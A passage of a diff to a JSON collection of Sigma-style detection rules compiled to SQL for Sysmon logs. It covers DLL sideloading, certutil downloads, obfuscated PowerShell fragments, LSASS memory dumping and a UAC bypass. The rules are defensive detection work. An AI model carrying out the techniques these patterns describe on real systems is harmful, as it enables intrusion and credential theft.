'%\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR Image LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cipher.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\write.exe' ESCAPE '\\' OR Image LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\') OR ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '%start%' ESCAPE '\\'))) OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.spl%' ESCAPE '\\' OR CommandLine LIKE '%route add%' ESCAPE '\\' OR CommandLine LIKE '%program files%' ESCAPE '\\')))) OR (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%add portopening%' ESCAPE '\\' OR CommandLine LIKE '%rule name%' ESCAPE '\\')))) OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '%.spl%' ESCAPE '\\'))) OR ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine LIKE '%rundll32.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\dsparse.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_spoolsv_susp_child_processes.yml" + "filename": "image_load_office_dsparse_dll_load.yml" }, { - "title": "Script Event Consumer Spawning Process", - "id": "f6d1dd2f-b8ce-40ca-bc23-062efb686b34", + "title": "Potential DLL Sideloading Via ClassicExplorer32.dll", + "id": "caa02837-f659-466f-bca6-48bde2826ab4", "status": "experimental", - "description": "Detects a suspicious child process of Script Event Consumer (scrcons.exe).", - "author": "Sittikorn S", + "description": "Detects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1047" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\scrcons.exe' ESCAPE '\\' AND (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\ClassicExplorer32.dll' ESCAPE '\\' AND NOT (ImageLoaded LIKE 'C:\\\\Program Files\\\\Classic Shell\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_scrcons_susp_child_process.yml" + "filename": "image_load_side_load_classicexplorer32.yml" }, { - "title": "Suspicious PowerShell Child Processes", - "id": "e4b6d2a7-d8a4-4f19-acbd-943c16d90647", - "status": "experimental", - "description": "Detects suspicious child processes spawned by PowerShell", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "title": "FoggyWeb Backdoor DLL Loading", + "id": "640dc51c-7713-4faa-8a0e-e7c0d9d4654c", + "status": "test", + "description": "Detects DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor. Which loads a malicious version of the expected \"version.dll\" dll", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.resource_development", + "attack.t1587" + ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') AND (Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\')) AND NOT ((ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkspacesConfig\\\\Scripts\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkspacesConfig\\\\Scripts\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ImageLoaded LIKE 'C:\\\\Windows\\\\ADFS\\\\version.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_susp_child_processes.yml" + "filename": "image_load_malware_foggyweb_nobelium.yml" }, { - "title": "Suspicious Obfuscated PowerShell Code", - "id": "8d01b53f-456f-48ee-90f6-bc28e67d4e35", + "title": "Suspicious Volume Shadow Copy Vssapi.dll Load", + "id": "37774c23-25a1-4adb-bb6d-8bb9fd59c0f8", "status": "experimental", - "description": "Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the image load of VSS DLL by uncommon executables", + "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%IAAtAGIAeABvAHIAIAAwAHgA%' ESCAPE '\\' OR CommandLine LIKE '%AALQBiAHgAbwByACAAMAB4A%' ESCAPE '\\' OR CommandLine LIKE '%gAC0AYgB4AG8AcgAgADAAeA%' ESCAPE '\\' OR CommandLine LIKE '%AC4ASQBuAHYAbwBrAGUAKAApACAAfAAg%' ESCAPE '\\' OR CommandLine LIKE '%AuAEkAbgB2AG8AawBlACgAKQAgAHwAI%' ESCAPE '\\' OR CommandLine LIKE '%ALgBJAG4AdgBvAGsAZQAoACkAIAB8AC%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMQB9AHsAMAB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADEAfQB7ADAAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAxAH0AewAwAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMAB9AHsAMwB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADAAfQB7ADMAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAwAH0AewAzAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMgB9AHsAMAB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADIAfQB7ADAAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAyAH0AewAwAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMQB9AHsAMAB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADEAfQB7ADAAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAxAH0AewAwAH0AJwAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMAB9AHsAMwB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADAAfQB7ADMAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAwAH0AewAzAH0AJwAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMgB9AHsAMAB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADIAfQB7ADAAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAyAH0AewAwAH0AJwAgAC0AZgAg%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\vssapi.dll' ESCAPE '\\' AND NOT (((Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR Image LIKE '\tC:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Temp\\\\{%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\ProgramData\\\\Package Cache\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_encoded_obfusc.yml" + "filename": "image_load_dll_vssapi_susp_load.yml" }, { - "title": "Suspicious Download Via Certutil.EXE", - "id": "19b08b1c-861d-4e75-a1ef-ea0c1baf202b", - "status": "test", - "description": "Detects the execution of certutil with certain flags that allow the utility to download files.", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Antivirus Software DLL Sideloading", + "id": "552b6b65-df37-4d3e-a258-f2fc4771ae54", + "status": "experimental", + "description": "Detects potential DLL sideloading of DLLs that are part of antivirus software suchas McAfee, Symantec...etc", + "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "tags": [ "attack.defense_evasion", - "attack.t1027" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Applications that load the same dlls mentioned in the detection section. Investigate them and filter them out if a lot FPs are caused.", + "Dell SARemediation plugin folder (C:\\Program Files\\Dell\\SARemediation\\plugin\\log.dll) is known to contain the 'log.dll' file.", + "The Canon MyPrinter folder 'C:\\Program Files\\Canon\\MyPrinter\\' is known to contain the 'log.dll' file" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((((((ImageLoaded LIKE '%\\\\log.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Program Files\\\\Bitdefender Antivirus Free\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Bitdefender Antivirus Free\\\\%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Program Files\\\\Dell\\\\SARemediation\\\\audit\\\\TelemetryUtility.exe' ESCAPE '\\' AND (ImageLoaded LIKE 'C:\\\\Program Files\\\\Dell\\\\SARemediation\\\\plugin\\\\log.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Dell\\\\SARemediation\\\\audit\\\\log.dll' ESCAPE '\\')) OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Canon\\\\MyPrinter\\\\%' ESCAPE '\\'))) OR (ImageLoaded LIKE '%\\\\qrt.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\F-Secure\\\\Anti-Virus\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\F-Secure\\\\Anti-Virus\\\\%' ESCAPE '\\')))) OR ((ImageLoaded LIKE '%\\\\ashldres.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lockdown.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vsodscpl.dll' ESCAPE '\\') AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\McAfee\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\McAfee\\\\%' ESCAPE '\\')))) OR (ImageLoaded LIKE '%\\\\vftrace.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\CyberArk\\\\Endpoint Privilege Manager\\\\Agent\\\\x32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\CyberArk\\\\Endpoint Privilege Manager\\\\Agent\\\\x32\\\\%' ESCAPE '\\')))) OR (ImageLoaded LIKE '%\\\\wsc.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\program Files\\\\AVAST Software\\\\Avast\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\program Files (x86)\\\\AVAST Software\\\\Avast\\\\%' ESCAPE '\\')))) OR (ImageLoaded LIKE '%\\\\tmdbglog.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\program Files\\\\Trend Micro\\\\Titanium\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\program Files (x86)\\\\Trend Micro\\\\Titanium\\\\%' ESCAPE '\\')))) OR (ImageLoaded LIKE '%\\\\DLPPREM32.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\program Files\\\\ESET%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\program Files (x86)\\\\ESET%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_certutil_download.yml" + "filename": "image_load_side_load_antivirus.yml" }, { - "title": "Control Panel Items", - "id": "0ba863e6-def5-4e50-9cea-4dd8c7dc46a4", + "title": "Suspicious Unsigned Dbghelp/Dbgcore DLL Loaded", + "id": "bdc64095-d59a-42a2-8588-71fd9c9d9abc", "status": "test", - "description": "Detects the malicious use of a control panel item", - "author": "Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_)", + "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecract use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", + "author": "Perez Diego (@darkquassar), oscd.community, Ecco", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218.002", - "attack.persistence", - "attack.t1546" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%CurrentVersion\\\\Control Panel\\\\CPLs%' ESCAPE '\\')) OR (CommandLine LIKE '%.cpl' ESCAPE '\\' AND NOT (((CommandLine LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%System\\%%' ESCAPE '\\')) OR (CommandLine LIKE '%regsvr32 %' ESCAPE '\\' AND CommandLine LIKE '% /s %' ESCAPE '\\' AND CommandLine LIKE '%igfxCPL.cpl%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\') AND Signed = 'false')" ], - "filename": "proc_creation_win_control_panel_item.yml" + "filename": "image_load_dll_dbghelp_dbgcore_unsigned_load.yml" }, { - "title": "Potential Download/Upload Activity Using Type Command", - "id": "aa0b3a82-eacc-4ec3-9150-b5a9a3e3f82f", + "title": "DLL Sideloading Of DBGCORE.DLL", + "id": "9ca2bf31-0570-44d8-a543-534c47c33ed7", "status": "experimental", - "description": "Detects usage of the \"type\" command to download/upload data from WebDAV server", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects DLL sideloading of \"dbgcore.dll\"", + "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Legitimate applications loading their own versions of the DLL mentioned in this rule" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%type %' ESCAPE '\\' AND CommandLine LIKE '% > \\\\\\\\\\*' ESCAPE '\\') OR (CommandLine LIKE '%type \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '% > %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_lolbin_type.yml" + "filename": "image_load_side_load_dbgcore_dll.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher", - "id": "b222df08-0e07-11eb-adc1-0242ac120002", - "status": "test", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "title": "Potential DLL Sideloading Via comctl32.dll", + "id": "6360757a-d460-456c-8b13-74cf0e60cceb", + "status": "experimental", + "description": "Detects potential DLL sideloading using comctl32.dll to obtain system privileges", + "author": "Nasreddine Bencherchali (Nextron Systems), Subhash Popuri (@pbssubhash)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND CommandLine LIKE '%clipboard]::%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\logonUI.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\werFault.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\narrator.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\windows\\\\system32\\\\wermgr.exe.local\\\\%' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\comctl32.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_clip.yml" + "filename": "image_load_side_load_comctl32.yml" }, { - "title": "Windows Update Client LOLBIN", - "id": "d7825193-b70a-48a4-b992-8b5b3015cc11", + "title": "UAC Bypass Using Iscsicpl - ImageLoad", + "id": "9ed5959a-c43c-4c59-84e3-d28628429456", "status": "experimental", - "description": "Detects code execution via the Windows Update client (wuauclt)", - "author": "FPT.EagleEye Team", + "description": "Detects the \"iscsicpl.exe\" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH%", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.execution", - "attack.t1105", - "attack.t1218" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'wuauclt.exe') AND (CommandLine LIKE '%/UpdateDeploymentProvider%' ESCAPE '\\' AND CommandLine LIKE '%/RunHandlerComServer%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /ClassId %' ESCAPE '\\' OR CommandLine LIKE '% wuaueng.dll %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\iscsicpl.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\iscsiexe.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\' AND ImageLoaded LIKE '%iscsiexe.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wuauclt_execution.yml" + "filename": "image_load_uac_bypass_iscsicpl.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION", - "id": "e9f55347-2928-4c06-88e5-1a7f8169942e", + "title": "Time Travel Debugging Utility Usage - Image", + "id": "e76c8240-d68f-4773-8880-5c6f63595aaf", "status": "test", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", + "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1218", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Legitimate usage by software developers/testers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%&&set%' ESCAPE '\\' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%{0}%' ESCAPE '\\' OR CommandLine LIKE '%{1}%' ESCAPE '\\' OR CommandLine LIKE '%{2}%' ESCAPE '\\' OR CommandLine LIKE '%{3}%' ESCAPE '\\' OR CommandLine LIKE '%{4}%' ESCAPE '\\' OR CommandLine LIKE '%{5}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE '%\\\\ttdrecord.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdwriter.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdloader.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_via_var.yml" + "filename": "image_load_tttracer_mod_load.yml" }, { - "title": "PUA - Nmap/Zenmap Execution", - "id": "f6ecd1cf-19b8-4488-97f6-00f0924991a3", - "status": "test", - "description": "Detects usage of namp/zenmap. Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation", - "author": "frack113", + "title": "DLL Loaded From Suspicious Location Via Cmspt.EXE", + "id": "75e508f7-932d-4ebc-af77-269237a84ce1", + "status": "experimental", + "description": "Detects cmstp loading \"dll\" or \"ocx\" files from suspicious locations", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1046" + "attack.defense_evasion", + "attack.t1218.003" ], "falsepositives": [ - "Network administrator computer" + "Unikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\nmap.exe' ESCAPE '\\' OR Image LIKE '%\\\\zennmap.exe' ESCAPE '\\') OR OriginalFileName IN ('nmap.exe', 'zennmap.exe')))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Users\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\') AND (ImageLoaded LIKE '%.dll' ESCAPE '\\' OR ImageLoaded LIKE '%.ocx' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_nmap_zenmap.yml" + "filename": "image_load_cmstp_load_dll_from_susp_location.yml" }, { - "title": "Suspicious RASdial Activity", - "id": "6bba49bf-7f8c-47d6-a1bb-6b4dece4640e", + "title": "GAC DLL Loaded Via Office Applications", + "id": "90217a70-13fc-48e4-b3db-0d836c5824ac", "status": "test", - "description": "Detects suspicious process related to rasdial.exe", - "author": "juju4", + "description": "Detects any GAC DLL being loaded by an Office Product", + "author": "Antonlovesdnb", "tags": [ - "attack.defense_evasion", "attack.execution", - "attack.t1059" + "attack.t1204.002" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Legitimate macro usage. Add the appropriate filter according to your environment" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%rasdial.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\assembly\\\\GAC\\_MSIL%' ESCAPE '\\')" ], - "filename": "proc_creation_win_rasdial_execution.yml" + "filename": "image_load_office_dotnet_gac_dll_load.yml" }, { - "title": "Add User to Local Administrators Group", - "id": "ad720b90-25ad-43ff-9b5e-5c841facc8e5", - "status": "experimental", - "description": "Detects suspicious command line that adds an account to the local administrators/administrateurs group", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "WMIC Loading Scripting 